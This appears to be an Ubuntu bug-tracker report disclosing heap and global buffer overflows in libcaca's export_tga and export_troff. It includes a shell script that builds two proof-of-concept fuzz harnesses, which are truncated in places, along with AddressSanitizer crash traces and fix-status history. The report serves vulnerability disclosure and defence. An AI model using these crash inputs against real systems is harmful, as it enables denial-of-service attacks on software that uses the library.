buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
libcaca (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
Hello Ubuntu Security Team
I use libfuzzer to test libcaca api .I found two crash
- https:/
- https:/
-------
## Vendor of Product
https:/
-------
## Affected Product Code Base
libcaca e4968ba
-------
## Affected Component
affected component:
-------
## Affected source code file
affected source code file(As call stack):
->caca_
-> export_tga() in libcaca/
-> export_troff() in libcaca/
-------
## Attack Type
Context-dependent
-------
## Impact Denial of Service
true
-------
## Reference
https:/
-------
## Discoverer
fdgnneig
-------
## Verification process and POC
### Verification steps:
1.Get the source code of libcaca:
2.Compile the libcaca.so library:
```shell
$ cd libcaca
$ apt-get install automake libtool pkg-config -y
$ ./bootstrap
$ ./configure
$ make
3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc
4.Run POC
-------
POC.sh
```
cat << EOF > poc_troff.cc
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fstream>
#include <iostream>
using namespace std;
extern "C" int LLVMFuzzerTestO
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)
memset(
memcpy(
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_
for(int i=0;i<4;i++)
for(int i=0;i<4;i++){
}
void* reData = caca_export_
if(reData!=NULL) free(reData);
caca_free_
cv=NULL;
free(buffer);
buffer=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] = {0x5f,0x20,
len = sizeof(
return 0;
}
EOF
clang++ -g poc_troff.cc -O2 -fno-omit-
cat << EOF > poc_tga.cc
#include "config.h"
#include "caca.h"
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fstream>
#include <iostream>
using namespace std;
extern "C" int LLVMFuzzerTestO
if(Size<8) return 0;
size_t len=0;
char* buffer = (char*)
memset(
memcpy(
buffer[Size]='\0';
caca_canvas_t *cv;
cv = caca_create_
for(int i=0;i<4;i++)
for(int i=0;i<4;i++){
}
void* reData = caca_export_
if(reData!=NULL) free(reData);
caca_free_
cv=NULL;
free(buffer);
buffer=NULL;
return 0;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] = {0x00,0xff,
len = sizeof(
return 0;
}
EOF
clang++ -g poc_tga.cc -O2 -fno-omit-
```
-------
The output is as follows
```shell
==1845495==ERROR: AddressSanitizer: heap-buffer-
WRITE of size 1 at 0x603000000022 thread T0
#0 0x7f905c1bf43f in export_tga /home/hh/
#1 0x7f905c1bf43f in caca_export_memory /home/hh/
#2 0x4c6d46 in LLVMFuzzerTestO
#3 0x4c6e1c in main /home/hh/
#4 0x7f905bc0e0b2 in __libc_start_main /build/
#5 0x41c39d in _start (/home/
0x603000000022 is located 0 bytes to the right of 18-byte region [0x603000000010
allocated by thread T0 here:
#0 0x494add in malloc (/home/
#1 0x7f905c1be0eb in export_tga /home/hh/
#2 0x7f905c1be0eb in caca_export_memory /home/hh/
#3 0x4c6d46 in LLVMFuzzerTestO
#4 0x4c6e1c in main /home/hh/
#5 0x7f905bc0e0b2 in __libc_start_main /build/
SUMMARY: AddressSanitizer: heap-buffer-
Shadow bytes around the buggy address:
0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c067fff8000: fa fa 00 00[02]fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1845495==ABORTING
```
```shell
==1845916==ERROR: AddressSanitizer: global-
READ of size 8 at 0x7f28d47e8140 thread T0
#0 0x7f28d46fb798 in export_troff /home/hh/
#1 0x7f28d46fb798 in caca_export_memory /home/hh/
#2 0x4c6d46 in LLVMFuzzerTestO
#3 0x4c6e1c in main /home/hh/
#4 0x7f28d414a0b2 in __libc_start_main /build/
#5 0x41c39d in _start (/home/
0x7f28d47e8140 is located 0 bytes to the right of global variable 'ansi2troff' defined in 'codec/
SUMMARY: AddressSanitizer: global-
Shadow bytes around the buggy address:
0x0fe59a8f4fd0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0fe59a8f4fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f4ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5010: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
=>0x0fe59a8f5020: 00 00 00 00 00 00 00 00[f9]f9 f9 f9 00 00 00 00
0x0fe59a8f5030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe59a8f5070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1845916==ABORTING
```shell
Tanks
CVE References
summary: |
- libcaca + libcaca buffer-overflow |
information type: | Private Security → Public Security |
summary: |
- libcaca buffer-overflow + buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff |
Changed in libcaca (Ubuntu): | |
status: | New → Confirmed |
Changed in libcaca (Ubuntu): | |
status: | Confirmed → Fix Released |
source code
## Affected Product Code Base
libcaca, 0.99.beta20
Ubuntu 20.04
libcaca 0.99.beta19